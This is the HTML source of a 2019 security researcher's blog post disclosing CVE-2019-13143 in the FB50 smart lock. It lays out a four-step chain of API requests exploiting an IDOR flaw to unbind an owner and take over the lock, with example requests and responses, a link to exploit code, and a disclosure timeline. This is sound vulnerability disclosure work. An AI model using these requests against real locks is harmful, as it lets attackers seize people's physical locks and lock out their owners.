build/blog/fb50/index.html (view raw)
1<!DOCTYPE html>
2<html lang=en>
3<link rel="stylesheet" href="/static/style.css" type="text/css">
4<link rel="stylesheet" href="/static/syntax.css" type="text/css">
5<link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico">
6<meta name="description" content="… and lessons learnt in IoT security">
7<meta name="viewport" content="initial-scale=1">
8<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
9<meta content="#021012" name="theme-color">
10<meta name="HandheldFriendly" content="true">
11<meta name="twitter:card" content="summary_large_image">
12<meta name="twitter:site" content="@icyphox">
13<meta name="twitter:title" content="Picking the FB50 smart lock (CVE-2019-13143)">
14<meta name="twitter:description" content="… and lessons learnt in IoT security">
15<meta name="twitter:image" content="/static/icyphox.png">
16<meta property="og:title" content="Picking the FB50 smart lock (CVE-2019-13143)">
17<meta property="og:type" content="website">
18<meta property="og:description" content="… and lessons learnt in IoT security">
19<meta property="og:url" content="https://icyphox.sh">
20<meta property="og:image" content="/static/icyphox.png">
21<html>
22 <title>
23 Picking the FB50 smart lock (CVE-2019-13143)
24 </title>
25<script src="//instant.page/1.1.0" type="module" integrity="sha384-EwBObn5QAxP8f09iemwAJljc+sU+eUXeL9vSBw1eNmVarwhKk2F9vBEpaN9rsrtp"></script>
26<div class="container-text">
27 <header class="header">
28
29 <a href="/">home</a>
30 <a href="/blog">blog</a>
31 <a href="/reading">reading</a>
32 <a href="https://twitter.com/icyphox">twitter</a>
33 <a href="/about">about</a>
34
35 </header>
36<body>
37 <div class="content">
38 <div align="left">
39 <p> 2019-08-05 </p>
40 <h1 id="picking-the-fb50-smart-lock-cve-2019-13143">Picking the FB50 smart lock (CVE-2019-13143)</h1>
41
42<h2 id="and-lessons-learnt-in-iot-security">… and lessons learnt in IoT security</h2>
43
44<p>(<em>originally posted at <a href="http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure">SecureLayer7’s Blog</a>, with my edits</em>)</p>
45
46<h3 id="the-lock">The lock</h3>
47
48<p>The lock in question is the FB50 smart lock, manufactured by Shenzhen
49Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands
50across many ecommerce sites, and has over, an estimated, 15k+ users.</p>
51
52<p>The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
53the Play/App Store to function. The app requires the user to create an
54account before further functionality is available.
55It also facilitates configuring the fingerprint,
56and unlocking from a range via Bluetooth.</p>
57
58<p>We had two primary attack surfaces we decided to tackle — Bluetooth (BLE)
59and the Android app.</p>
60
61<h3 id="via-bluetooth-low-energy-ble">Via Bluetooth Low Energy (BLE)</h3>
62
63<p>Android phones have the ability to capture Bluetooth (HCI) traffic
64which can be enabled under Developer Options under Settings. We made
65around 4 “unlocks” from the Android phone, as seen in the screenshot.</p>
66
67<p><img src="/static/img/bt_wireshark.png" alt="wireshark packets" /></p>
68
69<p>This is the value sent in the <code>Write</code> request:</p>
70
71<p><img src="/static/img/bt_ws_value.png" alt="wireshark write req" /></p>
72
73<p>We attempted replaying these requests using <code>gattool</code> and <code>gattacker</code>,
74but that didn’t pan out, since the value being written was encrypted.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
75
76<h3 id="via-the-android-app">Via the Android app</h3>
77
78<p>Reversing the app using <code>jd-gui</code>, <code>apktool</code> and <code>dex2jar</code> didn’t get us too
79far since most of it was obfuscated. Why bother when there exists an
80easier approach – BurpSuite.</p>
81
82<p>We captured and played around with a bunch of requests and responses,
83and finally arrived at a working exploit chain.</p>
84
85<h3 id="the-exploit">The exploit</h3>
86
87<p>The entire exploit is a 4 step process consisting of authenticated
88HTTP requests:</p>
89
90<ol>
91<li>Using the lock’s MAC (obtained via a simple Bluetooth scan in the
92vicinity), get the barcode and lock ID</li>
93<li>Using the barcode, fetch the user ID</li>
94<li>Using the lock ID and user ID, unbind the user from the lock</li>
95<li>Provide a new name, attacker’s user ID and the MAC to bind the attacker
96to the lock</li>
97</ol>
98
99<p>This is what it looks like, in essence (personal info redacted).</p>
100
101<h4 id="request-1">Request 1</h4>
102
103<pre><code>POST /oklock/lock/queryDevice
104{"mac":"XX:XX:XX:XX:XX:XX"}
105</code></pre>
106
107<p>Response:</p>
108
109<pre><code>{
110 "result":{
111 "alarm":0,
112 "barcode":"<BARCODE>",
113 "chipType":"1",
114 "createAt":"2019-05-14 09:32:23.0",
115 "deviceId":"",
116 "electricity":"95",
117 "firmwareVersion":"2.3",
118 "gsmVersion":"",
119 "id":<LOCK ID>,
120 "isLock":0,
121 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
122 "lockPwd":"000000",
123 "mac":"XX:XX:XX:XX:XX:XX",
124 "name":"lock",
125 "radioName":"BlueFPL",
126 "type":0
127 },
128 "status":"2000"
129}
130</code></pre>
131
132<h4 id="request-2">Request 2</h4>
133
134<pre><code>POST /oklock/lock/getDeviceInfo
135
136{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
137</code></pre>
138
139<p>Response:</p>
140
141<pre><code> "result":{
142 "account":"email@some.website",
143 "alarm":0,
144 "barcode":"<BARCODE>",
145 "chipType":"1",
146 "createAt":"2019-05-14 09:32:23.0",
147 "deviceId":"",
148 "electricity":"95",
149 "firmwareVersion":"2.3",
150 "gsmVersion":"",
151 "id":<LOCK ID>,
152 "isLock":0,
153 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
154 "lockPwd":"000000",
155 "mac":"XX:XX:XX:XX:XX:XX",
156 "name":"lock",
157 "radioName":"BlueFPL",
158 "type":0,
159 "userId":<USER ID>
160 }
161</code></pre>
162
163<h4 id="request-3">Request 3</h4>
164
165<pre><code>POST /oklock/lock/unbind
166
167{"lockId":"<LOCK ID>","userId":<USER ID>}
168</code></pre>
169
170<h4 id="request-4">Request 4</h4>
171
172<pre><code>POST /oklock/lock/bind
173
174{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
175</code></pre>
176
177<h3 id="thats-it-the-scary-stuff">That’s it! (& the scary stuff)</h3>
178
179<p>You should have the lock transferred to your account. The severity of this
180issue lies in the fact that the original owner completely loses access to
181their lock. They can’t even “rebind” to get it back, since the current owner
182(the attacker) needs to authorize that. </p>
183
184<p>To add to that, roughly 15,000 user accounts’ info are exposed via IDOR.
185Ilja, a cool dude I met on Telegram, noticed locks named “carlock”,
186“garage”, “MainDoor”, etc.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup> This is terrifying.</p>
187
188<p><em>shudders</em></p>
189
190<h3 id="proof-of-concept">Proof of Concept</h3>
191
192<p><a href="https://twitter.com/icyphox/status/1158396372778807296">PoC Video</a></p>
193
194<p><a href="https://github.com/icyphox/pwnfb50">Exploit code</a></p>
195
196<h3 id="disclosure-timeline">Disclosure timeline</h3>
197
198<ul>
199<li><strong>26th June, 2019</strong>: Issue discovered at SecureLayer7, Pune</li>
200<li><strong>27th June, 2019</strong>: Vendor notified about the issue</li>
201<li><strong>2nd July, 2019</strong>: CVE-2019-13143 reserved</li>
202<li>No response from vendor</li>
203<li><strong>2nd August 2019</strong>: Public disclosure</li>
204</ul>
205
206<h3 id="lessons-learnt">Lessons learnt</h3>
207
208<p><strong>DO NOT</strong>. Ever. Buy. A smart lock. You’re better off with the “dumb” ones
209with keys. With the IoT plague spreading, it brings in a large attack surface
210to things that were otherwise “unhackable” (try hacking a “dumb” toaster).</p>
211
212<p>The IoT security scene is rife with bugs from over 10 years ago, like
213executable stack segments<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, hardcoded keys, and poor development
214practices in general.</p>
215
216<p>Our existing threat models and scenarios have to be updated to factor
217in these new exploitation possibilities. This also broadens the playing
218field for cyber warfare and mass surveillance campaigns. </p>
219
220<h3 id="researcher-info">Researcher info</h3>
221
222<p>This research was done at <a href="https://securelayer7.net">SecureLayer7</a>, Pune, IN by:</p>
223
224<ul>
225<li>Anirudh Oppiliappan (me)</li>
226<li>S. Raghav Pillai (<a href="https://twitter.com/_vologue">@_vologue</a>)</li>
227<li>Shubham Chougule (<a href="https://twitter.com/shubhamtc">@shubhamtc</a>)</li>
228</ul>
229
230<div class="footnotes">
231<hr />
232<ol>
233<li id="fn-1">
234<p><a href="https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/">This</a> article discusses a similar smart lock, but they broke the encryption. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
235</li>
236
237<li id="fn-2">
238<p>Thanks to Ilja Shaposhnikov (@drakylar). <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
239</li>
240
241<li id="fn-3">
242<p><a href="https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf">PDF</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
243</li>
244</ol>
245</div>
246
247 </div>
248 <hr />
249 <p class="muted">Questions or comments? Open an issue at <a href="https://github.com/icyphox/site">this repo</a>, or send a plain-text email to <a href="mailto:icyph0x@pm.me">icyph0x@pm.me</a>.</p>
250 <footer>
251 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/"><img src="https://licensebuttons.net/l/by-nc-sa/4.0/80x15.png"></a>
252 </footer>
253 </body>
254 </div>
255 </html>